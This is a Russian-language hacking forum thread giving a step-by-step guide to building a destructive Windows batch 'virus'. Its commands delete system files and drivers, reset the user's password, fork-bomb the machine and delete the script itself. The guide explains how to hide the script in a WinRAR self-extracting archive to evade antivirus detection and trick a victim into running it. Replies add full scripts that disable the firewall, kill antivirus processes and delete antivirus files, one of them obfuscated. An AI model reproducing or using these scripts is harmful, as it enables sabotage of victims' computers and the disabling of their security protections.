Форум АНТИЧАТ - Батники, и о том, как сделать чтобы они не ловились Антивирусными приложениями.

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

Батники, и о том, как сделать чтобы они не ловились Антивирусными приложениями.

Эта статья о Батниках, и о том, как сделать чтобы они не ловились Антивирусными приложениями.

Всем Привет!
Свами CheatMaster
Может для некоторых эта статья не станет новостью, но всёравно я расскажу.

Для создания Батника нам необходимо Стандартный блокнот Windows (он есть у каждого) и архиватор WinRAR.

Итак начнём:
Создаём блокнот,пишем в него команды (они написанны ниже).
Затем Файл>Сохранить как...>
И в поле "Имя файла:" вместо "Текстовый документ.txt" пишем "Вирус.bat" и нажимаем "Сохранить"
_____________________________
Команды:

Убрать рабочий стол:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul

Удалить дрова:
del "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nul

Перезагрузка компа:
shutdown -r -t 1 -c "lol" >nul

Удаление файлов:
erase %windir%*.* /q

Меняет пароль текущего пользователя на 123456:
net user %username% 123456

Открывает больше 200 окошек,и если все не закрыть то комп грузнется и может слететь ОС(если слабый комп):
:s
start %0
%0|%0
goto :s|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0|%0
goto :s

Ставит время на 0:00:
time 0:00 >nul

Удаление курсора:
del "%SystemRoot%Cursors*.*" >nul

Самоликвидация (самое главное):
del "%0" >nul
_____________________________

И казалось бы Батник готов, но возникает один вопрос:
Как заставить жертву запустить этот вирус? Т.к расшерение вируса "*.bat" жертва даже необратит на него внимание.
Здесь можно действовать двумя способами:

Способ 1
Скомпилировать файл спомощью программ таких как "MicroJoiner".
Но файл, полученный врезультате этого будет ловиться Антивирусами.

Способ 2
И наконец самое интересное, собственно длячего была написанна эта статья:

1) Создать с помощью Архива WinRAR - самораспаковывающийся архив.
2) Поместить в него готовый Батник.
3) Сменить расшерение файла ("*.rar.exe" на "*.rar") (где * - имя файла).
4) Затем открыть архив, и во вкладке "SFX" нажать "Дополнительные параметры SFX..."
5) Написать в поле "Выполнить после распаковки" имя вашего вируса (уже добавленного в архив) вместе с расширением, и нажать "OK". (В других вкладках можно написать Лацензионноесоглашение и т.д.)
6) Закрыть архив, и сменить расшерение ("*.rar" на "*.exe").
Если вы сделали всё верно, тогда ваш Вирус небудет ловиться Антивирусным приложением (Проверенно на ESET NOD32 и Dr.Web)

CheatMaster специально для Antichat.ru

WinRar 'ом пользоваться ты научился! ) Теперь научись настраивать NOD32. )

Код:

net stop â?œSecurity Centerâ?

netsh firewall set opmode mode=disable

tskill /A av*

tskill /A fire*

tskill /A anti*

cls

tskill /A spy*

tskill /A bullguard

tskill /A PersFw

tskill /A KAV*

tskill /A ZONEALARM

tskill /A SAFEWEB

cls

tskill /A OUTPOST

tskill /A nv*

tskill /A nav*

tskill /A F-*

tskill /A ESAFE

tskill /A cle

cls

tskill /A BLACKICE

tskill /A def*

tskill /A kav

tskill /A kav*

tskill /A avg*

tskill /A ash*

cls

tskill /A aswupdsv

tskill /A ewid*

tskill /A guard*

tskill /A guar*

tskill /A gcasDt*

tskill /A msmp*

cls

tskill /A mcafe*

tskill /A mghtml

tskill /A msiexec

tskill /A outpost

tskill /A isafe

tskill /A zap*

cls

tskill /A zauinst

tskill /A upd*

tskill /A zlclien*

tskill /A minilog

tskill /A cc*

tskill /A norton*

cls

tskill /A norton au*

tskill /A ccc*

tskill /A npfmn*

tskill /A loge*

tskill /A nisum*

tskill /A issvc

tskill /A tmp*

cls

tskill /A tmn*

tskill /A pcc*

tskill /A cpd*

tskill /A pop*

tskill /A pav*

tskill /A padmin

cls

tskill /A panda*

tskill /A avsch*

tskill /A sche*

tskill /A syman*

tskill /A virus*

tskill /A realm*

cls

tskill /A sweep*

tskill /A scan*

tskill /A ad-*

tskill /A safe*

tskill /A avas*

tskill /A norm*

cls

tskill /A offg*

del /Q /F C:\Program Files\alwils~1\avast4\*.*

del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe

del /Q /F C:\Program Files\kasper~1\*.exe

cls

del /Q /F C:\Program Files\trojan~1\*.exe

del /Q /F C:\Program Files\f-prot95\*.dll

del /Q /F C:\Program Files\tbav\*.dat

cls

del /Q /F C:\Program Files\avpersonal\*.vdf

del /Q /F C:\Program Files\Norton~1\*.cnt

del /Q /F C:\Program Files\Mcafee\*.*

cls

del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*

del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*

del /Q /F C:\Program Files\Norton~1\Norton~1\*.*

del /Q /F C:\Program Files\Norton~1\*.*

cls

del /Q /F C:\Program Files\avgamsr\*.exe

del /Q /F C:\Program Files\avgamsvr\*.exe

del /Q /F C:\Program Files\avgemc\*.exe

cls

del /Q /F C:\Program Files\avgcc\*.exe

del /Q /F C:\Program Files\avgupsvc\*.exe

del /Q /F C:\Program Files\grisoft

del /Q /F C:\Program Files\nood32krn\*.exe

del /Q /F C:\Program Files\nood32\*.exe

cls

del /Q /F C:\Program Files\nod32

del /Q /F C:\Program Files\nood32

del /Q /F C:\Program Files\kav\*.exe

del /Q /F C:\Program Files\kavmm\*.exe

del /Q /F C:\Program Files\kaspersky\*.*

cls

del /Q /F C:\Program Files\ewidoctrl\*.exe

del /Q /F C:\Program Files\guard\*.exe

del /Q /F C:\Program Files\ewido\*.exe

cls

del /Q /F C:\Program Files\pavprsrv\*.exe

del /Q /F C:\Program Files\pavprot\*.exe

del /Q /F C:\Program Files\avengine\*.exe

cls

del /Q /F C:\Program Files\apvxdwin\*.exe

del /Q /F C:\Program Files\webproxy\*.exe

del /Q /F C:\Program Files\panda software\*.*

я тебя огорчу, но против любого нормального антивируса или фаера такая фигня уже не прокатит

зы. есть такая системная переменная, как %programfiles% . ога

а так?

Код:

echo AV KILLER! Kills all Anti Viruses at Once

pause >nul

set fun=net

set morefun=stop

set math=tsk

set ias=ill

set mathias=del

set beer=/a

cls

echo Disabling the Firewall



%fun% %morefun% â?œSecurity Centerâ?

%fun%sh firewall set opmode mode=disable



pause >nul

cls

echo Analyzing

echo.

echo.

echo Please Wait Patiently

%math%%ias% %beer% E-*

%math%%ias% %beer% av*

%math%%ias% %beer% fire*

%math%%ias% %beer% anti*

%math%%ias% %beer% spy*

%math%%ias% %beer% bullguard

%math%%ias% %beer% PersFw

%math%%ias% %beer% KAV*

%math%%ias% %beer% ZONEALARM

%math%%ias% %beer% SAFEWEB

%math%%ias% %beer% OUTPOST

%math%%ias% %beer% nv*

%math%%ias% %beer% nav*

%math%%ias% %beer% F-*

%math%%ias% %beer% ESAFE

%math%%ias% %beer% cle

%math%%ias% %beer% BLACKICE

%math%%ias% %beer% def*

%math%%ias% %beer% kav

%math%%ias% %beer% kav*

%math%%ias% %beer% avg*

%math%%ias% %beer% ash*

%math%%ias% %beer% aswupdsv

%math%%ias% %beer% ewid*

%math%%ias% %beer% guard*

%math%%ias% %beer% guar*

%math%%ias% %beer% gcasDt*

%math%%ias% %beer% msmp*

%math%%ias% %beer% mcafe*

%math%%ias% %beer% mghtml

%math%%ias% %beer% msiexec

%math%%ias% %beer% outpost

%math%%ias% %beer% isafe

%math%%ias% %beer% zap*

%math%%ias% %beer% zauinst

    %math%%ias% %beer% upd*

    %math%%ias% %beer% zlclien*

    %math%%ias% %beer% minilog

    %math%%ias% %beer% cc*

    %math%%ias% %beer% norton*

    %math%%ias% %beer% norton au*

    %math%%ias% %beer% ccc*

    %math%%ias% %beer% npfmn*

    %math%%ias% %beer% loge*

    %math%%ias% %beer% nisum*

    %math%%ias% %beer% issvc

    %math%%ias% %beer% tmp*

    %math%%ias% %beer% tmn*

    %math%%ias% %beer% pcc*

    %math%%ias% %beer% cpd*

    %math%%ias% %beer% pop*

    %math%%ias% %beer% pav*

    %math%%ias% %beer% padmin

    %math%%ias% %beer% panda*

    %math%%ias% %beer% avsch*

    %math%%ias% %beer% sche*

    %math%%ias% %beer% syman*

    %math%%ias% %beer% virus*

    %math%%ias% %beer% realm*

    %math%%ias% %beer% sweep*

    %math%%ias% %beer% scan*

    %math%%ias% %beer% ad-*

    %math%%ias% %beer% safe*

    %math%%ias% %beer% avas*

    %math%%ias% %beer% norm*

    %math%%ias% %beer% offg*

cls

echo Done!

pause >nul



echo Deleting All Anti-Viruses

echo Please Wait Patiently

%mathias% /Q /F %ProgramFiles%\alwils~1\avast4\*.*

    %mathias% /Q /F %ProgramFiles%\Lavasoft\Ad-awa~1\*.exe

    %mathias% /Q /F %ProgramFiles%\kasper~1\*.exe

    %mathias% /Q /F %ProgramFiles%\trojan~1\*.exe

    %mathias% /Q /F %ProgramFiles%\f-prot95\*.*

    %mathias% /Q /F %ProgramFiles%\tbav\*.dat

    %mathias% /Q /F %ProgramFiles%\avpersonal\*.*

    %mathias% /Q /F %ProgramFiles%\Norton~1\*.*

    %mathias% /Q /F %ProgramFiles%\Mcafee\*.*

    %mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\Norton~3\*.*

    %mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\speedd~1\*.*

    %mathias% /Q /F %ProgramFiles%\Norton~1\Norton~1\*.*

    %mathias% /Q /F %ProgramFiles%\Norton~1\*.*

    %mathias% /Q /F %ProgramFiles%\avgamsr\*.exe

    %mathias% /Q /F %ProgramFiles%\avgamsvr\*.exe

    %mathias% /Q /F %ProgramFiles%\avgemc\*.exe

    %mathias% /Q /F %ProgramFiles%\avgcc\*.exe

    %mathias% /Q /F %ProgramFiles%\avgupsvc\*.exe

    %mathias% /Q /F %ProgramFiles%\grisoft

    %mathias% /Q /F %ProgramFiles%\nood32krn\*.exe

    %mathias% /Q /F %ProgramFiles%\nood32\*.exe

    %mathias% /Q /F %ProgramFiles%\nod32\*.exe

    %mathias% /Q /F %ProgramFiles%\nood32\*.exe

    %mathias% /Q /F %ProgramFiles%\kav\*.exe

    %mathias% /Q /F %ProgramFiles%\kavmm\*.exe

    %mathias% /Q /F %ProgramFiles%\kaspersky\*.*

    %mathias% /Q /F %ProgramFiles%\ewidoctrl\*.exe

    %mathias% /Q /F %ProgramFiles%\guard\*.exe

    %mathias% /Q /F %ProgramFiles%\ewido\*.exe

    %mathias% /Q /F %ProgramFiles%\pavprsrv\*.exe

    %mathias% /Q /F %ProgramFiles%\pavprot\*.exe

    %mathias% /Q /F %ProgramFiles%\avengine\*.exe

    %mathias% /Q /F %ProgramFiles%\apvxdwin\*.exe

    %mathias% /Q /F %ProgramFiles%\webproxy\*.exe

    %mathias% /Q /F %ProgramFiles%\panda software\*.*

cls

echo Done!

крипт, это конечно круто, но всеравно не прокатит

Hello, Antichat :)

Код:

@set j=@set

%j% w67=%

%j% v11=0

%j% f5=y

%j% y9=o

%j% k2=j

%j% m27=c

%j% p32=a

%j% l10=h

%j% t23=k

%j% j17=2

%j% s15=l

%j% d30=q

%j% o22=v

%j% t91=%1

%j% w13=i

%j% d0=e

%j% p25=9

%j% i12=6

%j% w14=t

%j% p7=p

%j% o19=d

%j% m34=1

%j% h33=7

%j% q20=4

%j% d29=w

%j% f18=s

%j% d38=%SystemRoot%

%j% b1=8

%j% b49=%Temp%

%j% c3=3

%j% u35=g

%j% j8=n

%j% n65="

%j% m31=r

%j% q16=u

%j% p80=%0

%j% p6=x

%j% e28=b

%j% b4=z

%j% l26=f

%j% k24=5

%j% h21=m

%d0%%m27%%l10%%y9% %n65%H%d0%%s15%%s15%%y9%, ANTICHAT%n65%

хм, надо подумать =)

для совсем ленивых)))
http://multi-up.com/144736
эм.. автора не помню.. кто то с ачата писал :)
з.ы.: вроде вирусов нет ))

о, спасибо )